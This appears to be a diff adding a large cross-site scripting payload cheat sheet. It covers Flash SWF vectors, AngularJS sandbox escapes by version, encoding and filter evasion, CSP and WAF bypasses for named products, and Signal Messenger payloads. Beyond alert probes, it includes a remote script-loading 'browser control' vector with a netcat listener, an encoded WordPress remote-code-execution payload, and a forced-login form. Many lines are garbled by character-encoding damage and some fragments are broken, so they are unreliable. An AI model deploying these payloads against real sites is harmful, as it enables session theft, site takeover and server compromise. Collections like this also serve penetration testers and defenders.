+
+
+
+
+
+ ![]()
+ exp/*
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+Flash SWF XSS
+
+ ZeroClipboard: ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf
+
+ plUpload Player: plupload.flash.swf?%#target%g=alert&uid%g=XSS&
+
+ plUpload MoxiePlayer: Moxie.swf?target%g=confirm&uid%g=XSS (also works with Moxie.cdn.swf and other variants)
+
+ FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert1
+
+ videoJS: video-js.swf?readyFunction=confirm and video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29
+
+ YUI "io.swf": io.swf?yid=\"));}catch(e){alert(document.domain);}//
+
+ YUI "uploader.swf": uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<
+
+ Open Flash Chart: open-flash-chart.swf?get-data=(function(){alert(1)})()
+
+ AutoDemo: control.swf?onend=javascript:alert(1)//
+
+ Adobe FLV Progressive: /main.swf?baseurl=asfunction:getURL,javascript:alert(1)// and /FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//
+
+ Banner.swf (generic): banner.swf?clickTAG=javascript:alert(document.domain);//
+
+ JWPlayer (legacy): player.swf?playerready=alert(document.domain) and /player.swf?tracecall=alert(document.domain)
+
+ SWFUpload 2.2.0.1: swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//
+
+ Uploadify (legacy): uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf
+
+ FlowPlayer 3.2.7: flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf
+
+
+
+a="get";
+b="URL(\"";
+c="javascript:";
+d="alert('XSS');\")";
+eval(a+b+c+d);
+
+
+XML Schema
+
+
+ XSS
+
+]]>
+
+
+
+<IMG SRC="javascript:alert('XSS')">
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+XSS'\x22"%22>4<%\u0022/*
+
+
+
+
+
+
+
+alert("XSS")'); ?>
+
+
+
+Redirect 302 /test.jpg http://test.com/admin.asp&deleteuser
+
+
+ +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
+
+
+PT SRC="http://test.com/xss.js">
+XSS
+XSS
+XSS
+XSS
+
+%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E
+
+<iframe src=http://test.de>
+
+<iframe src=http://test.de>
+
+PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+<\x00img src='1' onerror=alert(0) />
+
+alert(1)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ì>![]( "test-xss")
+
+
+Firefox (\x09, \x0a, \x0d, \x20)
+Chrome (Any character \x01 to \x20)
+
+
+
+alert(0)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+Joker
+Joker
+Joker
+Joker
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+< = %C0%BC = %E0%80%BC = %F0%80%80%BC
+> = %C0%BE = %E0%80%BE = %F0%80%80%BE
+' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
+" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
+
+
+%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
+
+
+
++ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
+
+
+
+%uff1cscript%uff1ealert(1)%uff1c/script%uff1e
+
+
+
+%u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+';
+
+
+
+'); }
+
+
+
+
+ (IE)
+ (Firefox, Chrome, Safari)
+ (Firefox, Chrome, Safari)
+
+
+http://test.com/something.xxx?a=val1&a=val2
+ASP.NET a = val1,val2
+ASP a = val1,val2
+JSP a = val1
+PHP a = val2
+
+
+
+ (Firefox)
+
+http://test.com/something.jsp?inject=#alert(1)
+
+
+
+
+
+
+
+
+
+ ">
+
+xxs link
+
+<![CDATA[
+
+<a onmouseover=alert(document.cookie)>xxs link</a>
+<a onmouseover=alert(document.cookie)>%20<h>xxs link<a><iframe src="c" onload=alert(1)>
+
+<div onactivate=alert('XSSTEST') id=xss style=overflow:scroll>
+
+Ij48IjxpbWcgc3JjPSJ4Ij4lMjAlMjA+IjxpZnJhbWUgc3JjPWE+JTIwPGlmcmFtZT4=
+
+
+
+
+String Char Eval
+ {{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
+
+ 'a'.constructor.prototype['char\u0041t']
+
+ 'a'.constructor.prototype['char\u0041t']=''.concat;
+
+{{'a'.constructor.prototype['char\u0041t']=''.concat;
+$eval("x='\"+(y='if(!window\\u002?x)alert(window\\u002ex=1)')+eval(y)+\"'");}}
+
+
+{{
+ ({}.toString()).constructor.prototype.charAt=[].join;
+ $eval(({}.toString()).constructor.fromCharCode(120,61,49,125,32,125,32,125,59,97,108,101,114,116,40,49,41,47,47))
+}}
+
+
+
+{{
+ x=toString();x.constructor.prototype.charAt=x.constructor.prototype.concat;
+ $eval(x.constructor.fromCharCode(120,61,49,125,32,125,32,125,59,97,108,101,114,116,40,49,41,47,47))
+}}
+
+
+
+t=o.anchor(true);//<a name="true">[object Undefined]</a>
+
+
+
+{{
+c=[];
+o=toString();
+t=o.anchor(true);
+f=o.anchor(false);
+c.push(o[5]);
+c.push(o[1]);
+c.push(t[3]);
+c.push(f[12]);
+c.push(t[9]);
+c.push(t[10]);
+c.push(t[11]);
+c.push(o[5]);
+c.push(t[9]);
+c.push(o[1]);
+c.push(t[10]);
+a=c.join([]);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[c.join([])].fromCharCode(97,108,101,114,116,40,49,41))()
+}}
+
+
+
+<!-- If you control the name, will work on Firefox in any context, will fail in chromium in DOM -->
+<svg/onload=eval(name)>
+
+<!-- If you control the URL, Safari-only -->
+<iframe/onload=write(URL)>
+
+<!-- If you control the URL -->
+<svg/onload=eval(`'`+URL)>
+
+<!-- If you controll the name, but unsafe-eval not enabled -->
+<svg/onload=location=name>
+
+<!-- Just a casual script -->
+<script/src=//?.?></script>
+
+<!-- If you control the name of the window -->
+<iframe/onload=src=top.name>
+
+<!-- If you control the URL -->
+<iframe/onload=eval('`'+URL)>
+
+<!-- If number of iframes on the page is constant -->
+<iframe/onload=src=top[0].name+/\?.??/>
+
+<!-- for Firefox only -->
+<iframe/srcdoc="<svg><script/href=//?.? />">
+
+<!-- If number of iframes on the page is random -->
+<iframe/onload=src=contentWindow.name+/\?.??/>
+
+<!-- If unsafe-inline is disabled in CSP and external scripts allowed -->
+<iframe/srcdoc="<script/src=//?.?></script>">
+
+<!-- If inline styles are allowed -->
+<style/onload=eval(name)>
+
+<!-- If inline styles are allowed, Safari only -->
+<style/onload=write(URL)>
+
+<!-- If inline styles are allowed and the URL can be controlled -->
+<style/onload=eval(`'`+URL)>
+
+<!-- If inline styles are blocked -->
+<style/onerror=eval(name)>
+
+<!-- Uses external script as import, doesn't work in innerHTML unless Firefox -->
+<!-- The PoC only works on https and Chrome, because ?.? checks for Sec-Fetch-Dest header -->
+<svg/onload=import(/\\?.?/)>
+
+<!-- Uses external script as import, triggers if inline styles are allowed.
+<!-- The PoC only works on https and Chrome, because ?.? checks for Sec-Fetch-Dest header -->
+<style/onload=import(/\\?.?/)>
+
+<!-- Uses external script as import -->
+<!-- The PoC only works on https and Chrome, because ?.? checks for Sec-Fetch-Dest header -->
+<iframe/onload=import(/\\?.?/)>
+
+
+HTML Context
+Tag Injection <svg onload=alert(1)>
+ì><svg onload=alert(1)//
+
+
+HTML Context
+Inline Injection ìonmouseover=alert(1)//
+ìautofocus/onfocus=alert(1)//
+
+
+Javascript Context
+Code Injection ë-alert(1)-ë
+ë-alert(1)//
+
+
+Javascript Context
+Code Injection
+(escaping the escape) \í-alert(1)//
+
+
+Javascript Context
+Tag Injection
+</script><svg onload=alert(1)>
+
+
+PHP_SELF Injection
+http://DOMAIN/PAGE.php/î><svg onload=alert(1)>
+
+
+Without Parenthesis
+<svg onload=alert`1`>
+<svg onload=alert(1)>
+<svg onload=alert(1)>
+<svg onload=alert(1)>
+
+
+Filter Bypass
+Alert Obfuscation
+(alert)(1)
+a=alert,a(1)
+[1].find(alert)
+top[ìalî+îertî](1)
+top[/al/.source+/ert/.source](1)
+al\u0065rt(1)
+top[ëal\145rtí](1)
+top[ëal\x65rtí](1)
+top[8680439..toString(30)](1)
+
+
+Body Tag
+<body onload=alert(1)>
+<body onpageshow=alert(1)>
+<body onfocus=alert(1)>
+<body onhashchange=alert(1)><a href=#x>click this!#x
+<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
+<body onscroll=alert(1)><br><br><br><br>
+<br><br><br><br><br><br><br><br><br><br>
+<br><br><br><br><br><br><br><br><br><br>
+<br><br><br><br><br><br><x id=x>#x
+<body onresize=alert(1)>press F12!
+<body onhelp=alert(1)>press F1! (MSIE)
+
+
+Miscellaneous Vectors
+<marquee onstart=alert(1)>
+<marquee loop=1 width=0 onfinish=alert(1)>
+<audio src onloadstart=alert(1)>
+<video onloadstart=alert(1)><source>
+<input autofocus onblur=alert(1)>
+<keygen autofocus onfocus=alert(1)>
+<form onsubmit=alert(1)><input type=submit>
+<select onchange=alert(1)><option>1<option>2
+<menu id=x contextmenu=x onshow=alert(1)>right click me!
+
+
+Agnostic Event Handlers
+<x contenteditable onblur=alert(1)>lose focus!
+<x onclick=alert(1)>click this!
+<x oncopy=alert(1)>copy this!
+<x oncontextmenu=alert(1)>right click this!
+<x oncut=alert(1)>copy this!
+<x ondblclick=alert(1)>double click this!
+<x ondrag=alert(1)>drag this!
+<x contenteditable onfocus=alert(1)>focus this!
+<x contenteditable oninput=alert(1)>input here!
+<x contenteditable onkeydown=alert(1)>press any key!
+<x contenteditable onkeypress=alert(1)>press any key!
+<x contenteditable onkeyup=alert(1)>press any key!
+<x onmousedown=alert(1)>click this!
+<x onmousemove=alert(1)>hover this!
+<x onmouseout=alert(1)>hover this!
+<x onmouseover=alert(1)>hover this!
+<x onmouseup=alert(1)>click this!
+<x contenteditable onpaste=alert(1)>paste here!
+
+
+Code Reuse
+Inline Script <script>alert(1)//
+<script>alert(1)<!ñ
+
+
+Code Reuse
+Regular Script <script src=//localhost:8080/1.js>
+<script src=//3334957647/1>
+
+
+Filter Bypass
+Generic Tag + Handler
+Encoding Mixed Case Spacers
+%3Cx onxxx=1
+<%78 onxxx=1
+<x %6Fnxxx=1
+<x o%6Exxx=1
+<x on%78xx=1
+<x onxxx%3D1 <X onxxx=1
+<x OnXxx=1
+<X OnXxx=1Doubling
+<x onxxx=1 onxxx=1 <x/onxxx=1
+<x%09onxxx=1
+<x%0Aonxxx=1
+<x%0Conxxx=1
+<x%0Donxxx=1
+<x%2Fonxxx=1
+Quotes Stripping Mimetism
+<x 1=í1íonxxx=1
+<x 1=î1?onxxx=1 <[S]x onx[S]xx=1
+
+
+[S] = stripped char or string
+<x </onxxx=1
+<x 1=î>î onxxx=1
+<http://onxxx%3D1/
+
+Generic Source Breaking
+<x onxxx=alert(1) 1=í
+
+
+Browser Control
+<svg onload=setInterval(function(){with(document)body.
+appendChild(createElement(ëscriptí)).src=í//HOST:PORTí},0)>$ while :; do printf ìj$ ì; read c; echo $c | nc -lp PORT >/dev/null; done
+
+
+Multi Reflection Double Reflection
+Single Input Single Input (script-based)
+ëonload=alert(1)><svg/1=í ë>alert(1)</script><script/1=í
+*/alert(1)</script><script>/*
+
+Triple Reflection
+Single Input Single Input (script-based)
+*/alert(1)î>íonload=î/*<svg/1=í
+`-alert(1)î>íonload=î`<svg/1=í */</script>í>alert(1)/*<script/1=í
+
+
+Multi Input Double Input Triple Input
+p=<svg/1=í&q=íonload=alert(1)>
+p=<svg 1=í&q=íonload=í/*&r=*/alert(1)í>
+
+
+Without Event Handlers
+<script>alert(1)</script>
+<script src=javascript:alert(1)>
+<iframe src=javascript:alert(1)>
+<embed src=javascript:alert(1)>
+<a href=javascript:alert(1)>click
+<math><brute href=javascript:alert(1)>click
+<form action=javascript:alert(1)><input type=submit>
+<isindex action=javascript:alert(1) type=submit value=click>
+<form><button formaction=javascript:alert(1)>click
+<form><input formaction=javascript:alert(1) type=submit value=click>
+<form><input formaction=javascript:alert(1) type=image value=click>
+<form><input formaction=javascript:alert(1) type=image src=SOURCE>
+<isindex formaction=javascript:alert(1) type=submit value=click>
+<object data=javascript:alert(1)>
+<iframe srcdoc=<svg/onload=alert(1)>>
+<svg><script xlink:href=data:,alert(1) />
+<math><brute xlink:href=javascript:alert(1)>click
+<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
+
+
+Mobile Only
+Event Handlers
+<html ontouchstart=alert(1)>
+<html ontouchend=alert(1)>
+<html ontouchmove=alert(1)>
+<html ontouchcancel=alert(1)>
+<body onorientationchange=alert(1)>
+
+
+Javascript Properties Functions
+<svg onload=alert(navigator.connection.type)>
+<svg onload=alert(navigator.battery.level)>
+<svg onload=alert(navigator.battery.dischargingTime)>
+<svg onload=alert(navigator.battery.charging)> <svg onload=navigator.vibrate(500)>
+<svg onload=navigator.vibrate([500,300,100])>
+
+
+Generic Self to Regular XSS
+<iframe src=LOGOUT_URL onload=forms[0].submit()>
+</iframe><form method=post action=LOGIN_URL>
+<input name=USERNAME_PARAMETER_NAME value=USERNAME>
+<input name=PASSWORD_PARAMETER_NAME value=PASSWORD>
+
+
+File Upload Injection in Filename
+ì><img src=1 onerror=alert(1)>.gifInjection in Metadata
+$ exiftool -Artist='î><img src=1 onerror=alert(1)>í FILENAME.jpegInjection with SVG File
+<svg xmlns=îhttp://www.w3.org/2000/svgî onload=îalert(document.domain)î/>
+
+
+Injection with GIF File as Source of Script (CSP Bypass)
+GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
+
+Google Chrome
+Auditor Bypass
+<script src=îdata:,alert(1)//
+ì><script src=data:,alert(1)//<script src=î//localhost:8080/1.js#
+ì><script src=//localhost:8080/1.js#<link rel=import href=îdata:text/html,<script>alert(1)</script>
+ì><link rel=import href=data:text/html,<script>alert(1)</script>
+<svg><animate xlink:href=#x attributeName=href values=javascript:alert(1) /><a id=x><rect width=100 height=100 /></a>
+
+Chrome < v60 beta XSS-Auditor Bypass
+
+<script src="data:,alert(1)%250A-->
+
+Other Chrome XSS-Auditor Bypasses
+
+<script>alert(1)</script
+
+<script>alert(1)%0d%0a-->%09</script
+
+<x>%00%00%00%00%00%00%00<script>alert(1)</script>
+
+Safari XSS Vector
+
+<script>location.href;'javascript:alert%281%29'</script>
+
+XSS Polyglot
+
+jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
+
+PHP File for XHR Remote Call
+<?php header(ìAccess-Control-Allow-Origin: *î); ?>
+<img src=1 onerror=alert(1)>
+Server Log Avoidance <svg onload=eval(URL.slice(-8))>#alert(1)
+<svg onload=eval(location.hash.slice(1)>#alert(1)
+<svg onload=innerHTML=location.hash>#<script>alert(1)</script>
+
+<svg/onload=javascript:void(0)?void(0):void(0)?void(0):void(0)?void(0):void(0)?void(0):confirm(location)>
+
+
+Shortest PoC
+<base href=//0>
+
+
+$ while:; do echo ìalert(1)î | nc -lp80; done
+Portable WordPress RCE <script/src=îdata:,eval(atob(location.hash.slice(1)))//#
+#eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd
+Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w
+aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n
+X3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC
+5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRV
+RbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE
+9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHl
+wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD
+Qp4LnNlbmQoJCk=http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD
+
+
+Invisble JS Alert
+([,?,,,,??]=[]+{},[???,??,????,???,,?????,????,??????,,,?????]=[!!?]+!?+?.?)
+[??+=?+?????+??????+???+??+????+??+???+?+??][??]
+(?????+????+???+??+???+'`#JS!`')``
+
+
+Markdown XSS
+
+[a](javascript:confirm(1))
+
+[a](javascript://www.test.com%0Aprompt(1))
+
+[a](javascript://%0d%0aconfirm(1))
+
+[a](javascript://%0d%0aconfirm(1);com)
+
+[a](javascript:window.onerror=confirm;throw%201)
+
+[a]: (javascript:prompt(1))
+
+[a]:(?javascript:alert(1))
+
+
+Angular JS
+'a'.constructor.fromCharCode=[].join;
+'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
+
+{{
+'a'.constructor.prototype.charAt=[].join;
+eval('x=1} } };alert(1)//');
+}}
+
+AngularJS Template Injection based XSS
+
+1.0.1 - 1.1.5
+
+{{constructor.constructor('alert(1)')()}}
+
+1.2.0 - 1.2.1
+
+{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
+
+1.2.2 - 1.2.5
+
+{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
+
+1.2.6 - 1.2.18
+
+{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
+
+1.2.19 - 1.2.23
+
+{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
+
+1.2.24 - 1.2.29
+
+{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
+
+1.3.0
+
+{{!ready && (ready = true) && (
+ !call
+ ? $$watchers[0].get(toString.constructor.prototype)
+ : (a = apply) &&
+ (apply = constructor) &&
+ (valueOf = call) &&
+ (''+''.toString(
+ 'F = Function.prototype;' +
+ 'F.apply = F.a;' +
+ 'delete F.a;' +
+ 'delete F.valueOf;' +
+ 'alert(1);'
+ ))
+ );}}
+
+1.3.1 - 1.3.2
+
+{{
+ {}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
+ 'a'.constructor.prototype.charAt=''.valueOf;
+ $eval('x=alert(1)//');
+}}
+
+1.3.3 - 1.3.18
+
+{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
+
+ 'a'.constructor.prototype.charAt=[].join;
+ $eval('x=alert(1)//'); }}
+
+1.3.19
+
+{{
+ 'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
+ $eval('x=alert(1)//');
+}}
+
+1.3.20
+
+{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
+
+1.4.0 - 1.4.9
+
+{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
+
+1.5.0 - 1.5.8
+
+{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
+
+1.5.9 - 1.5.11
+
+{{
+ c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
+ c.$apply=$apply;c.$eval=b;op=$root.$$phase;
+ $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
+ C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
+ B=C(b,c,b);$evalAsync("
+ astNode=pop();astNode.type='UnaryExpression';
+ astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
+ astNode.argument={type:'Identifier',name:'foo'};
+ ");
+ m1=B($$asyncQueue.pop().expression,null,$root);
+ m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
+ $eval('a(b.c)');[].push.apply=a;
+}}
+
+1.6.0+ (no Expression Sandbox)
+
+{{constructor.constructor('alert(1)')()}}
+
+Content Security Policy (CSP) bypass via JSONP endpoints
+
+Grab the target's CSP:
+
+curl -I http://example.com | grep 'Content-Security-Policy'
+
+
+Lightweight Markup Languages
+
+RubyDoc (.rdoc)
+
+XSS[JavaScript:alert(1)]
+
+Textile (.textile)
+
+"Test link":javascript:alert(1)
+
+reStructuredText (.rst)
+
+`Test link`__.
+
+__ javascript:alert(document.domain)
+
+Unicode characters
+
+Üáï<img src=a onerror=javascript:alert('test')>ÖâÄ
+
+
+
+Sanbox Bypasses
+{{constructor.constructor('alert(1)')()}}
+
+{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
+
+{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
+
+{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
+
+{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
+
+{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
+
+{{!ready && (ready = true) && (
+ !call
+ ? $$watchers[0].get(toString.constructor.prototype)
+ : (a = apply) &&
+ (apply = constructor) &&
+ (valueOf = call) &&
+ (''+''.toString(
+ 'F = Function.prototype;' +
+ 'F.apply = F.a;' +
+ 'delete F.a;' +
+ 'delete F.valueOf;' +
+ 'alert(1);'
+ ))
+ );}}
+
+{{
+ {}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
+ 'a'.constructor.prototype.charAt=''.valueOf;
+ $eval('x=alert(1)//');
+}}
+
+{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
+ 'a'.constructor.prototype.charAt=[].join;
+ $eval('x=alert(1)//'); }}
+
+{{
+ 'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
+ $eval('x=alert(1)//');
+}}
+
+{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
+
+{{
+ c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
+ c.$apply=$apply;c.$eval=b;op=$root.$$phase;
+ $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
+ C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
+ B=C(b,c,b);$evalAsync("
+ astNode=pop();astNode.type='UnaryExpression';
+ astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
+ astNode.argument={type:'Identifier',name:'foo'};
+ ");
+ m1=B($$asyncQueue.pop().expression,null,$root);
+ m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
+ $eval('a(b.c)');[].push.apply=a;
+}}
+
+{{constructor.constructor('alert(1)')()}}
+
+
+Kona WAF (Akamai) Bypass
+
+\');confirm(1);//
+
+ModSecurity WAF Bypass Note: This kind of depends on what security level the application is set to. See: https://modsecurity.org/rules.html
+
+<img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)>
+
+Wordfence XSS Bypasses
+
+<meter onmouseover="alert(1)"
+
+'">><div><meter onmouseover="alert(1)"</div>"
+
+>><marquee loop=1 width=0 onfinish=alert(1)>
+
+Incapsula WAF Bypasses
+
+<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
+
+<img/src=q onerror='new Function`al\ert\`1\``'>
+
+jQuery < 3.0.0 XSS
+
+$.get('http://sakurity.com/jqueryxss')
+
+In order to really exploit this jQuery XSS you will need to fulfil one of the following requirements:
+
+ Find any cross domain requests to untrusted domains which may inadvertently execute script.
+ Find any requests to trusted API endpoints where script can be injected into data sources.
+
+URL verification bypasses (works without 	 too)
+
+javas	cript://www.google.com/%0Aalert(1)
+
+
+
+
+
+
+Signal Messenger Payloads
+http://testdomain/?p=%3Ciframe%20src="/etc/passwd"%3E%3C/iframe%3E%20PENTEST
+
+http://testdomain/?p=%3d%3Ciframe%20src=\\DESKTOP-[LOCALPATH]\Temp\rce.html%3E
+
+http://testdomain/?p=%3d%3Ciframe%20src=\\xxx.xxx.xxx.xxx\Temp\rce.html%3E
+
+http://testdomain/?p=%3Ciframe%20src="testfile.html"%3E%3C/iframe%3E%20PENTEST
+
+http://testdomain/?p=%3Ciframe%20srcdoc="<p>PENTEST</p>"%3E%3C/iframe%3E
+
+http://testdomain/?p=%3Caudio%20autoplay%20src="/usr/share/sounds/gnome/default/alerts/bark.ogg"%20type="audio/ogg"%3E%3C/audio%3E
+
+http://testdomain/?p=%3Cvideo%20autoplay%20loop%20src="/usr/share/help/C/gnome-help/figures/display-dual-monitors.webm"%20type="video/webm"%3E%3C/video%3E
+
+http://testdomain/?p=%3Cform%20method='POST'%20action='https://domain.de/url'%3E%3Cinput%20type='text'%20name='data'%20value='from_form'/%3E%3Cinput%20type='submit'/%3E%3C/form%3E
+
+
+
+
+Waf Engine Bypass
+<svg onload\r\n=$.globalEval("al"+"ert()");>
+<img onload\r\n=$.globalEval("al"+"ert()");>
+<iframe src="\\" onload\r\n=$.globalEval("al"+"ert()");>
]]> |